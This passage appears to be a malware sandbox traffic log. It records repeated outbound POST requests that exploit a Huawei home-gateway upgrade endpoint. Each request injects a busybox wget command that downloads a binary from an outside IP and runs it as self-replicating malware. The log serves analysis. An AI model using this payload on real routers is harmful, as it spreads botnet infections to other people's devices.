                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1262192.168.2.1353610157.211.185.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531584978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1263192.168.2.1346798157.90.115.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531614065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1264192.168.2.1347338174.122.244.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531645060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1265192.168.2.1356808157.203.114.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531672001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1266192.168.2.1334244157.8.129.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.531692028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1267192.168.2.135987441.67.24.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532044888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1268192.168.2.133881241.64.115.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532073021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1269192.168.2.1334876157.238.52.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532260895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1270192.168.2.1338268157.206.14.3837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532290936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1271192.168.2.1340912122.208.26.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.532320976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 